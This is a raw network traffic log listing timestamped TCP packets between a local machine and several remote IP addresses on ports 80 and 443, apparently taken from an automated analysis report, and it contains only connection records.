                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.763717890 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.763722897 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.763756037 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.763758898 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.763761044 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.763768911 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.763773918 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.763777971 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.763822079 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.763847113 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.763853073 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.763879061 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.763884068 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.763890028 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.763895988 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.763900995 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.763915062 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.763936996 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.763969898 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.763977051 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.763988018 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.763993979 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.764027119 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.764039040 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.764357090 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.764369965 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.764377117 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.764381886 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.764403105 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.764408112 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.764415026 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.764417887 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.764420986 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.764441967 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.764478922 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768038988 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768181086 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768212080 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768218994 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768224955 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768249035 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768260956 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768265963 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768279076 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768292904 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768309116 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768316031 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768317938 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768327951 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768358946 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768378019 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768394947 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768402100 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768413067 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768419981 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768425941 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768457890 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768481970 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768490076 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768507004 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768512964 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768518925 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768521070 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768524885 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768533945 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768542051 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768573999 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768573999 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768630981 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768636942 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768646955 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768651962 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768657923 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768662930 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768668890 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768698931 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768698931 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768721104 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768733025 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768757105 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768763065 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768811941 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768817902 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768829107 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768843889 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768843889 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768857956 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768893957 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768899918 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768906116 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768908978 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768979073 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768985033 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768986940 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.768996954 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769042969 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769042969 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769066095 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769072056 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769083023 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769088984 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769112110 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769117117 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769123077 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769135952 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769141912 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769141912 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769141912 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769165039 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769171000 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769176960 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769182920 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769192934 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769211054 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769359112 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769365072 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769376040 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769392014 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769403934 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769423008 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769438028 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769443989 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769448996 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769454002 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769463062 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769469976 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769479990 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769493103 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769499063 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769507885 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769514084 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769527912 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769534111 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769535065 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769542933 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769546986 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769578934 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769594908 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769594908 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769603014 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769608021 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769613028 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769623041 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769629955 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769643068 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769681931 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769890070 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769896030 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769906998 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769912958 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769917965 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769925117 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769948959 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769959927 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.769969940 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.770059109 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.770065069 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.770073891 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.770080090 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.770085096 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.770090103 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.770095110 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.770101070 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.770103931 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.770107031 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.770113945 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.770119905 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.770121098 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.770124912 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.770131111 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.770140886 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.770167112 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.770198107 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.770204067 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.770215034 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.770220041 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.770226002 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.770231009 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.770236015 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.770241976 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.770246983 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.770248890 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.770268917 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.770281076 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.770469904 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.770488024 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.770514011 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.770596027 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.770602942 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.770607948 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.770615101 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.770620108 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.770626068 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.770631075 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.770642996 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.770652056 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.770718098 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.779242992 CEST44349726162.241.61.218192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.779340982 CEST49726443192.168.2.9162.241.61.218
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.786964893 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.786972046 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.786989927 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.786994934 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.786999941 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.787005901 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.787013054 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.787018061 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.787050009 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.787065029 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.787071943 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.787084103 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.787108898 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.787115097 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.787115097 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.787115097 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.787125111 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.787163019 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.787233114 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.787240028 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.787280083 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.787308931 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.787314892 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.787327051 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.787332058 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.787343025 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.787355900 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.787373066 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.787422895 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.787431002 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.787476063 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.788075924 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.788136959 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.788150072 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.788161039 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.788167000 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.788199902 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.788211107 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.788216114 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.788217068 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.788228989 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.788263083 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.788309097 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.788315058 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.788326025 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.788331032 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.788341999 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.788357973 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.788369894 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.788372040 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.788392067 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.788424015 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.788438082 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.788444996 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.788486958 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.788564920 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.788570881 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.788582087 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.788588047 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.788614988 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.788626909 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.788660049 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.788674116 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.788685083 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.788691044 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.788716078 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.788728952 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.788742065 CEST8049713176.113.115.33192.168.2.9
